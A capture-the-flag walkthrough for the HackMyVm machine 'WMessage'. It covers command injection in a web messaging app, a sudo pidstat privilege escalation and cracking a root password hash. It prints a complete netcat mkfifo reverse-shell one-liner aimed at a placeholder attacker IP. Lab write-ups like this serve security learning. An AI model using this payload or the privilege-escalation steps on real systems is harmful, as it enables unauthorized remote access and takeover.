HackMyVm: WMessage
Today we are going to take a look at WMessage on HackMyVm: https://hackmyvm.eu/machines/machine.php?vm=WMessage
We will as usual start off with an NMAP scan:
Alright, easy day, just 2 ports open, going over to port 80 we see the following:
We can sign up, and after we do we can log in:
Looks like we can run a command within the messages, lets see if we can utilize a | or ; to get some command injection. We will first see if we can ping ourselves and to do this we will utilize tcpdump:
Now send the message, note you may have to refresh the page:
Awesome, we have command injection, which means we should be able to get a reverse shell. We will be utilize a nc mkfifo reverse shell as show below:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR IP HERE> 4242 >/tmp/f
We have out listener up and running, and once we click send message we get a reverse shell:
When we get on the system I always like to try sudo -l even if I am www-data and we get a hit
Alright it looks like we can run pidstat, I also notice we have something called ROOTPASS which we will keep in mind for later. Looking on GTFO Bins we find the following for pidstat
We may be able to make a bash reverse shell in /tmp and the run pidstat:
With our listener running we get a reverse shell with messagemaster:
We can see that we get a callback. Lets do another sudo -l:
Now we can run md5sum, remember that ROOTPASS we saw from the beginning, lets MD5 that and then crack it:
From here things get very interesting. I was not able to crack this hash with either john the ripper or hashcat, however, I was able to create a python3 script that cracked it. The script that I created can be found here:
Now lets copy that hash and put it into our script:
We found a match, we can now use that password to su into root:
Hopefully you enjoyed the writeup and learned something new along the way.